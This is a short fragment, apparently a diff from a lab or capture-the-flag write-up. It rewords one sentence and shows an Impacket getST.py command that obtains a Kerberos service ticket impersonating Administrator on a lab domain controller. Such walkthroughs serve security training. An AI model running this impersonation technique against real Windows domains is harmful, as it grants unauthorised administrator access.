Skip to main content

 #

-Once the password is changed to match the ticket hash, let’s obtain a service ticket impersonating Administrator:
+With the password now matching the ticket hash, the next step is obtaining a service ticket impersonating Administrator:

 elliot@exegol:~$ KRB5CCNAME=wsilva.ccache getST.py -u2u -impersonate Administrator -spn cifs/DC.phantom.vl phantom.vl/wsilva -k -no-pass